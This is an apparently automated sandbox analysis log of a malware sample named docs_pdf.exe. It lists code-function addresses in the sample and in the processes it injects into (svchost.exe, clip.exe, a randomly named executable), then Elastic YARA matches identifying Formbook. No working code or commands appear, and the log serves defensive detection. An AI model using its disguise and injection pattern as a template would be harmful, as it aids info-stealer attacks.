            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE6A940_2_00FE6A94
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FC8A0E0_2_00FC8A0E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01030AE20_2_01030AE2
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDCD610_2_00FDCD61
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE70060_2_00FE7006
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FC31900_2_00FC3190
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FC710E0_2_00FC710E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB12870_2_00FB1287
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD33C70_2_00FD33C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDF4190_2_00FDF419
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD16C40_2_00FD16C4
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FC56800_2_00FC5680
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD78D30_2_00FD78D3
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FC58C00_2_00FC58C0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD1BB80_2_00FD1BB8
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE9D050_2_00FE9D05
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FBFE400_2_00FBFE40
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDBFE60_2_00FDBFE6
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD1FD00_2_00FD1FD0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00F836000_2_00F83600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011C01_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021A51_2_004021A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021B01_2_004021B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FACB1_2_0040FACB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FAD31_2_0040FAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023201_2_00402320
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023BC1_2_004023BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D4431_2_0042D443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164331_2_00416433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCF31_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DD731_2_0040DD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F501_2_00402F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA3521_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F01_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035003E61_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E02741_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C02C01_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C81581_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034301001_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA1181_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F81CC1_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F41A21_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035001AA1_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D20001_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034647501_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034407701_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C01_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C6E01_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034405351_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035005911_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F24461_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E44201_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EE4F61_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB401_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F6BD71_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA801_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034569621_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A01_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350A9A61_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344A8401_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428401_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E8F01_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034268B81_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4F401_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03482F281_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460F301_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432FC81_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BEFA01_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440E591_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEE261_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEEDB1_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452E901_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FCE931_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344AD001_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DCD1F1_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343ADE01_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458DBF1_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440C001_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430CF21_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0CB51_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342D34C1_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F132D1_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348739A1_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B2C01_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E12ED1_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345D2F01_2_0345D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034452A01_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347516C1_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342F1721_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350B16B1_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344B1B01_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EF0CC1_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034470C01_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F70E91_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF0E01_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF7B01_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034856301_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F16CC1_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F75711_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035095C31_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DD5B01_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034314601_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF43F1_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFB761_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B5BF01_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347DBF91_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FB801_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFA491_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7A461_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B3A6C1_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EDAC61_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DDAAC1_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03485AA01_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E1AA31_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034499501_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B9501_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D59101_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AD8001_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034438E01_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFF091_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD21_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD51_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03441F921_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFFB11_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03449EB01_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03443D401_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F1D5A1_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7D731_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FDC01_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B9C321_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFCF21_2_034FFCF2
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037D61152_2_037D6115
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037D80952_2_037D8095
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037F57E52_2_037F57E5
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037DE7D52_2_037DE7D5
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037DE7D12_2_037DE7D1
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037D7E752_2_037D7E75
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeCode function: 2_2_037D7E6D2_2_037D7E6D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0493E4F63_2_0493E4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049344203_2_04934420
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049424463_2_04942446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049505913_2_04950591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048905353_2_04890535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AC6E03_2_048AC6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0488C7C03_2_0488C7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B47503_2_048B4750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048907703_2_04890770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049220003_2_04922000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049441A23_2_049441A2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049501AA3_2_049501AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049481CC3_2_049481CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048801003_2_04880100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0492A1183_2_0492A118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049181583_2_04918158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049102C03_2_049102C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049302743_2_04930274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049503E63_2_049503E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0489E3F03_2_0489E3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494A3523_2_0494A352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04930CB53_2_04930CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04880CF23_2_04880CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04890C003_2_04890C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048A8DBF3_2_048A8DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0488ADE03_2_0488ADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0489AD003_2_0489AD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0492CD1F3_2_0492CD1F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494CE933_2_0494CE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048A2E903_2_048A2E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494EEDB3_2_0494EEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494EE263_2_0494EE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04890E593_2_04890E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0490EFA03_2_0490EFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04882FC83_2_04882FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04932F303_2_04932F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D2F283_2_048D2F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048B0F303_2_048B0F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04904F403_2_04904F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048768B83_2_048768B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048BE8F03_2_048BE8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0489A8403_2_0489A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048928403_2_04892840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048929A03_2_048929A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0495A9A63_2_0495A9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048A69623_2_048A6962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0488EA803_2_0488EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04946BD73_2_04946BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494AB403_2_0494AB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494F43F3_2_0494F43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048814603_2_04881460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0492D5B03_2_0492D5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049595C33_2_049595C3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049475713_2_04947571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049416CC3_2_049416CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D56303_2_048D5630
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494F7B03_2_0494F7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048970C03_2_048970C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0493F0CC3_2_0493F0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494F0E03_2_0494F0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049470E93_2_049470E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0489B1B03_2_0489B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C516C3_2_048C516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0487F1723_2_0487F172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0495B16B3_2_0495B16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048952A03_2_048952A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AB2C03_2_048AB2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AD2F03_2_048AD2F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049312ED3_2_049312ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D739A3_2_048D739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494132D3_2_0494132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0487D34C3_2_0487D34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FCF23_2_0494FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04909C323_2_04909C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AFDC03_2_048AFDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04893D403_2_04893D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04941D5A3_2_04941D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04947D733_2_04947D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04899EB03_2_04899EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04891F923_2_04891F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FFB13_2_0494FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04853FD53_2_04853FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04853FD23_2_04853FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FF093_2_0494FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048938E03_2_048938E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048FD8003_2_048FD800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_049259103_2_04925910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048999503_2_04899950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AB9503_2_048AB950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048D5AA03_2_048D5AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04931AA33_2_04931AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0492DAAC3_2_0492DAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0493DAC63_2_0493DAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04947A463_2_04947A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FA493_2_0494FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04903A6C3_2_04903A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048AFB803_2_048AFB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04905BF03_2_04905BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048CDBF93_2_048CDBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0494FB763_2_0494FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027917203_2_02791720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027AA2803_2_027AA280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278CB303_2_0278CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278ABB03_2_0278ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278C9103_2_0278C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0278C9083_2_0278C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027932703_2_02793270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471A43A3_2_0471A43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471C0FC3_2_0471C0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471B1683_2_0471B168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471BC443_2_0471BC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0471BD643_2_0471BD64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 106 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 048FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0490F290 appears 103 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0487B970 appears 262 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 048D7E54 appears 107 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 048C5130 appears 58 times
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: String function: 00FD8B40 appears 42 times
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: String function: 00FD0D27 appears 70 times
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: String function: 00FB7F41 appears 35 times
            Source: docs_pdf.exe, 00000000.00000003.1669498522.0000000003633000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
            Source: docs_pdf.exe, 00000000.00000003.1670406644.00000000037DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
            Source: docs_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
